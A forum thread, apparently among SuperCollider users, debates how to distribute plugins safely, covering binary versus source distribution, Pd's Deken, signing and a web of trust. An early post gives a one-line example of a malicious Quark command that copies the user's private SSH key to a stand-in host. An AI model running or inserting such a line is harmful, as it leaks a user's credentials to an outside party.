Moving some SC3Plugins into the "Core"…

Yes, Arch install binaries are signed by trusted users. I was an Arch user for many years, many years ago. They are built in isolated build environments, like any other serious distribution.

The xz would reach Arch before other distros just because Arch updates often. That’s all I said.

Also, the xz case involved a lot of social engineering so a person became “trusted”.

At the same time, it’s part of the system the AUR (Arch User Repository) builds scripts. They are built locally. I contributed many audio-related PKGBUILDS.

Yes but that’s still a vulnerability. If the build environment gets hacked (and has been demonstrated many times, there are numerous ways in which that can happen), then those binaries are compromised.

And Arch is a fairly high value target.

Pkgbuilds, at least if you’re reasonably technical, are less vulnerable as you can audit those.

E.g. if James Harkins put a "scp ~/.ssh/id_rsa example.com".unixCmd in a popular ddw* Quark it would be likely to be discovered at some point and have great reputational cost for him.

So you trust his source code, but wouldn’t trust his binaries?

My point above, about open-source, auditable, same-for-all-OS-and-arch code is that the question is not really about trusting an individual user (or a large group of them).
We can and do inspect sclang code every day. We actually don’t just rely on “James seems like a great guy, I’m sure it’s all fine.” (James, sorry to be using you as an example!)

Even if you did trust a developer, they couldn’t be expected to provide binaries for all OSes and architectures. So now you might have a relatively-random person compiling for Windows, let’s say, and they can modify the code however they want, trivially.

The key point, to me, is that you can’t both have:

  1. Binary distribution
  2. An “open world” with no (or minimal) core UGens

This is the security (and stability) nightmare scenario: users are just thrown into the internet to look for cool sounds, maybe given hints about what’s best by more- or less-honest people.

“Install this plugin” on a random github page: it’s the problems of shareware all over again.

All of us have to trust binaries in some part of our lives, but I think people are not appreciating how quickly you can go from fairly trustworthy to not trustworthy at all, by relaxing a few requirements. There is safety in the status quo, and while we need to modernize what plugins are available, this really seems like the wrong way to go. (It also seems like a huge amount of new code to write and set of services to maintain.)

My alternative plan is to tweak the status quo, with three categories in ascending levels of trust:

  1. The open internet
    • People hack on new plugins as they do today, published wherever they like
    • The custom is to distribute source code and motivated early adopters can compile the code themselves (again, as they do today)
    • These early adopters can begin to audit the code, if they want, and maybe join with the authors to improve the plugins
  2. The “outer core”: a replacement (or revamp) of sc3-plugins
    • A grab-bag of things which are useful and popular enough that power users might want to try
    • Has a group of maintainers who audit the code for stability and security. They don’t necessarily verify the code is correct or elegant or efficient.
    • If plugins are old, bad, unmaintained, etc. yank them out! There shouldn’t be a long-term expectation that plugins here won’t change or be removed.
      • Maintainers of the “outer core” are not expected to improve these plugins, either. If a plugin needs improvement it should be improved by its author or someone else motivated.
    • Binaries can maybe be provided, possibly even through package managers like apt, but building from source should be easy
      • These binaries would need good chain of custody, signing, etc.
    • There’s a process for a plugin author to (try to) get their plugin added to this outer core
  3. Inner core: what ships with SC
    • These currently are trustworthy and many have been working for decades with minor or no changes. Keep them there.
    • There should be an expectation that a piece written with these will continue to play in the future
    • If you apt install supercollider, you’ll definitely get these - maybe as binaries
    • Very rarely, a plugin from the outer core proves to be so stable and so useful that it moves into the inner core where everyone can use it with ease
      • The majority of the work for this should not fall on the core maintainers, but on the group petitioning for a plugin’s inclusion

I think this is pretty close to what we’re already doing, with some tweaks to help us modernize. The only big ask is that a group of maintainers step up to dust off sc3-plugins (or to start a modern equivalent). This seems like much less work than building a trustworthy method of cross-platform, open-world binary distribution.

1 Like

Linux distros’ work with cross-platform, trusted users and isolated build environments (which by itself requires a framework, etc.) is a lot of work. And I wonder why the Linux world hasn’t changed this model and replicated this insanity for every distro.

When a UGen is simple, compiling locally would be much simpler. Emacs, for example, compiles vterm and other simple programs locally, you barely notice it. I know some UGens are not simple, but they are not that complex.

When a UGen is simple, compiling locally would be much simpler. Emacs, for example, compiles vterm and other simple programs locally, you barely notice it.

Emacs compiles elisp files. Not the same thing at all.

I know some UGens are not simple, but they are not that complex.

Anything involving C++, CMake and any external libraries is complex.

1 Like

it compiles vterm from c

Even if you did trust a developer, they couldn’t be expected to provide binaries for all OSes and architectures.

Well, we are already expected to do this. With a package manager like Deken it would be easier to offload compilation to other (trusted) users. Although in practice developers will likely continue to provide all binaries. With GitHub actions it’s not that hard, see Automatically build, compile and release SuperCollider plugins using Github Actions | Mads Kjeldgaard. (Personally, I’m using the CI system of my ex-university.)

The key point, to me, is that you can’t both have:

  1. Binary distribution
  2. An “open world” with no (or minimal) core UGens

Of course you can! Pd is living proof of it. What you can’t have is perfect security. Most users just don’t care. But again, if a user has security concerns, they can always build from source – or use their system package manager.

“Install this plugin” on a random github page: it’s the problems of shareware all over again.

But that’s already the status quo! With the added downside that plugins are not discoverable.

  1. The open internet

    These early adopters can begin to audit the code, if they want, and maybe join with the authors to improve the plugins

And then what? You did not provide any solution for the issue of distribution and discoverability.

  1. The “outer core”: a replacement (or revamp) of sc3-plugins

How do you envision this replacement or revamp? How would it be different from the current monorepo?

Has a group of maintainers who audit the code for stability and security.

Where do you expect to find this group of maintainers? We barely have enough maintainers to maintain SC itself. IMO it makes more sense for each author to take care of their own plugins.

There’s a process for a plugin author to (try to) get their plugin added to this outer core

There is a limit on how big such a monorepo can grow before it becomes completely unmaintainable.

As I said, sc3plugins is already frozen. There have been quite a few new UGen plugins in the last few years but none of them have been added to sc3plugins. I think the authors (including myself) have not even tried because the development model just isn’t attractive. I want to work on my plugins on my own pace and not coordinate releases with dozens of other plugin authors.

That being said, a set of trusted community-vetted plugins would still be a good idea, but this can be provided as some sort of “meta-quark”. The individual plugins could be built with SC’s CI pipeline and hosted on the SC website (just as they currently are).

I think this is pretty close to what we’re already doing

Yes, but it does not solve the issues I have been pointing out, most notably the distribution and discoverability of plugins outside of sc3plugins resp. the “outer core”.

This seems like much less work than building a trustworthy method of cross-platform, open-world binary distribution.

You are right that adding support for binaries requires some work, but I’m pretty sure it would pay off in the long run. It certainly did for Pd.

Also, this is not only about server plugins. In the future we will hopefully also get language plugins. In fact, I already have concrete ideas for a language plugin interface, I just don’t have the time to make a PoC…

1 Like

100 percent in favor of adding capability of distributing binaries to the Quarks system. In terms of next steps perhaps an RFC is in order?

2 Likes

(Apologies in advance for the long message, but I do believe I’m addressing many points without much repetition:)

in practice developers will likely continue to provide all binaries. With GitHub actions it’s not that hard, see Automatically build, compile and release SuperCollider plugins using Github Actions | Mads Kjeldgaard. (Personally, I’m using the CI system of my ex-university.)

IMO developer-provided binaries brings us from a good security model to the problems of Windows shareware decades ago. Github Actions could be a step in the right direction (more on that below).

The key point, to me, is that you can’t both have:

  1. Binary distribution
  2. An “open world” with no (or minimal) core UGens

Of course you can! Pd is living proof of it.

Pd is living proof of what? Can you provide more information here about how Pd handles security? All I’ve heard so far is that:

  • Anyone in the world can upload multiple binaries,
  • which cannot reasonably be inspected,
  • are different for every OS and CPU architecture,
  • which are downloaded and run on a user’s computer unsandboxed,
  • with full user privileges,
  • which have so far not been caught doing anything malicious,
  • that you’ve personally heard about

Which of these points are wrong?

(I’m assuming the binary distribution is at least immutable, i.e. everyone requesting a plugin for an OS+arch pair gets the same binary, but is this actually true?)

What you can’t have is perfect security. Most users just don’t care.

What I’m proposing is not perfect security: there’s plenty of surface area for a motivated attacker.
What I’m proposing instead is basic security: can we at all say what the binaries we’re running are doing?

I don’t agree that most users don’t care, and further I think most of the ones who don’t care would care if they had the decision explained to them.
Most users exist in a tranquil multi-decade tradition of chain of custody that you’re proposing breaking.

“Install this plugin” on a random github page: it’s the problems of shareware all over again.

But that’s already the status quo!

The status quo is “here’s my C++, feel free to inspect it and compile it”

What you’re proposing is “click this button to run my binary on your computer”

You did not provide any solution for the issue of distribution and discoverability.

My vision would be that, similar to today:

  1. SC (the inner core) is for everyone and proud of it
  2. The “outer core,” be it sc3-plugins or something new, is for power users who are willing to live with some rough edges
  3. The open internet it for the avant-garde, people who want to try bleeding-edge stuff and can either read the code, know the developer, or want to live dangerously

A person who just wants to try SC should be using #1, and if they outgrow it maybe experiment with #2. It would be a huge misfeature to make unsophisticated users wade through possibly incomplete, buggy or worse plugins.

Where do you expect to find this group of maintainers? We barely have enough maintainers to maintain SC itself. IMO it makes more sense for each author to take care of their own plugins.

For any of the work we’re discussing, your solution or mine, motivated people would need to step up.
Without peoples’ labor, we’re stuck with the status quo.
I think we’re discussing what direction motivated people might want to move in.
(Also, writing a multi-platform binary package manager with decentralized discoverability seems like a lot more work to me, personally)

There’s a process for a plugin author to (try to) get their plugin added to this outer core

There is a limit on how big such a monorepo can grow before it becomes completely unmaintainable.

Is that true? And if it is, like Scott, I’d be glad to have that problem. If so many people start developing high-quality plugins that it becomes too much to handle, we could certainly split from one repo to different repos for instruments, reverbs, etc.

But it’s true that the “outer core” doesn’t need to be a monorepo. It could even consist of git submodules so plugin developers can work in their own repos (assuming they use git). The point is that it’s audited by trusted members of the developer team.

sc3plugins is already frozen. There have been quite a few new UGen plugins in the last few years but none of them have been added to sc3plugins.

Right, we both agree the status quo is stagnant. My proposal is to allow the “outer core” to be revitalized, including ripping out any old stuff that’s too much of a maintenance burden.

I think the authors (including myself) have not even tried because the development model just isn’t attractive. I want to work on my plugins on my own pace and not coordinate releases with dozens of other plugin authors.

This is an important point: development needs to be easy for authors. I don’t think my proposal prevents that, though.

That being said, a set of trusted community-vetted plugins would still be a good idea, but this can be provided as some sort of “meta-quark”. The individual plugins could be built with SC’s CI pipeline and hosted on the SC website (just as they currently are).

Building with a trusted open-source CI pipeline, with all files coming from VCS, with automatic uploads to a central trusted host, would be a big improvement to your proposal as long as chain of custody remained unbroken. That to me sounds a lot like sc3-plugins today, though. I don’t know how it would work without what I’m calling an “outer core,” some kind of vetting.

1 Like

Can you provide more information here about how Pd handles security?

You need to register for an account to upload packages. For each package the user can see by whom and when it was uploaded. That’s good enough for most people (including myself). If you want to be careful, you can verify the GPG signature (if present), see GitHub - pure-data/deken: Externals wrangler for Pure Data. If you do not trust the binaries, you can always build your plugins from source. If you are on Linux, you can use your system package manager.

I should also mention that most popular packages are developed and uploaded by trusted community members. When I see that a package has been uploaded by zmoelnig, for example, the chance for it being malicious is practically zero.

Deken has been around for almost 8 years. I cannot recall a single incident. Pd is not NPM or Debian. You are right that there is a risk, but for me its negligible.

No, in practice it’s not.

What you’re proposing is “click this button to run my binary on your computer”

But that is the reality. I’m sure that most people who, for example, use VSTPlugin just download my prebuild binaries. You really cannot expect regular SC users to fiddle with CMake and C++ compiler toolchains.

(Also, writing a multi-platform binary package manager with decentralized discoverability seems like a lot more work to me, personally)

Who said it has to be decentralized? I would rather tend towards a centralized solution.

Regarding the development work: the basic Quark infrastructure is already there. The hardest part is probably to find a place where to host the binaries. (I do not propose that Quarks should download binaries from random URLs.)

That to me sounds a lot like sc3-plugins today, though.

The biggest issue with sc3-plugins IMO is the development model. It’s a big monorepo where plugin authors cannot make individual releases. How should development in this new “outer core” actually work? Say, I discover a bug in my plugin. Do I have to wait until someone (who?) decides it’s time for the next release of the whole plugin set?

How large should this “outer core” be at maximum? What about all the other plugins? Just to give you a perspective, Deken currently hosts 241 libraries, many of which contain dozens, sometimes even hundreds of objects, see Deken - Pure Data externals Database.

1 Like

Guys, one thing to remember is how huge that is for PD compared to SC. I remember trying to compile pd-extended back in the day, and it took so much time I don’t even remember. Those are not problems at the same scale.

Let’s put security and practicality back in balance. And nothing is perfect in this area anyway.

I believe that “trusted users” (the weak part that will be up for discussion) signing the binaries is a moderate and sensible level of security compatible with this project’s scale. Yes, there are risks, and some people with privileges can sometimes lose it and do or say crazy things. (I don’t think an isolated build environment is practical for us, for example).

Building from source for those requiring more security will also be available.

1 Like

I thought about the same thing. We could show some kind of badge (e g. “verified”) if a plugin has been reviewed and uploaded by a trusted user

1 Like

If the binary is signed, the packager will need to use their key, and the user will need to be able to verify. So they just need to “trust a user” (import the pub key) once. This can be shown in the UI as a badge.

EDIT: One step further into security (and MORE convenient) would be the “web of trust model”. It’s something the community would need to decide. With this model, the user just needs to import the master keys once, and the “web of trust” will just accept other “trusted users” automatically. I feel this one fits the sc project…

https://www.gnupg.org/gph/en/manual.html#AEN385

EDIT2: Those security tools are already part of all systems (in case someone thinks I’m suggesting those things would need to be implemented, etc). The work would be more collective organization than writing code.

My experience with compiling anything is that it’s a crap shoot at best. And I’m reasonably technical.

If you mandate any security feature, you will have to deal with the majority of people who cannot get that stuff to work. See for example the current nightmare about signed packages on OSX (getting non-signed VSTs to work on the mac is a pain, even if you know the right incantations).

Giving people tools so they can manage this if they want is fine. Mandating it is going to end in lots of stuff ‘not working’, and lots of support time spent trying to help people.

In a web of trust model, I think you just need the master keys. The quark system could check a key server when a new trusted user key is found. The user can disable signature checking at any time.

I think PGP and the Web of Trust Model may be the only solutions that would satisfy the two opposing views in this discussion. It is very simple and convenient, and it’s as close as military-grade encryption (or certification, in this case) we can have.

In a web of trust model, I think you just need the master keys. The quark system could check a key server when a new trusted user key is found. The user can disable signature checking at any time.

No, a sophisticated user can disable signature checking. For most users you’re just adding another thing to go wrong - and it will go wrong.

Most people don’t understand any of this stuff, nor do they really want to learn it just so they can make some sounds with some piece of software that their buddy told them about. Instead the thought process will go - I tried it, it didn’t work, oh well what can you expect from a free piece of software. THE END.

2 Likes

You are right.

Maybe we don’t have the capacity to do it. The quarks package manager is buggy and featureless; let’s be realistic.

By the way, I remember now that I started using Arch before Keyring and experienced the first version of Pacman-key (a wrapper for GnuPG adapted from another script from Debian…, nothing fancy…,

To reiterate, things can go right if done right. Maybe we just don’t have enough people.

Let’s remember that the democratization of encryption technology was MUCH more present just a few years ago. Now it seems we “gave up”. Remember the conversation between the Cypherpunks 10 years ago:

https://www.youtube.com/watch?v=zlqOmAOqEmk

Hi,
this is a comment more or less in relation with this thread, concerning good practice we should adopt for coding. As user it would be very convenient as well for ourself than for sharing code to mention as a heading comment of our code all external Classes, Ugens, Quarks, and so on (with their respective GitHub links or others if needed) required to run the said code.
for instance:

// require: VSTPlugin [ https://git.iem.at/pd/vstplugin/-/releases ]
1 Like

That’s good practice since we don’t have better tools. Also good practice: add the version and commit hash (sometimes there is no versioning, sometimes the quark changes too fast) for each quark and plugin for a project.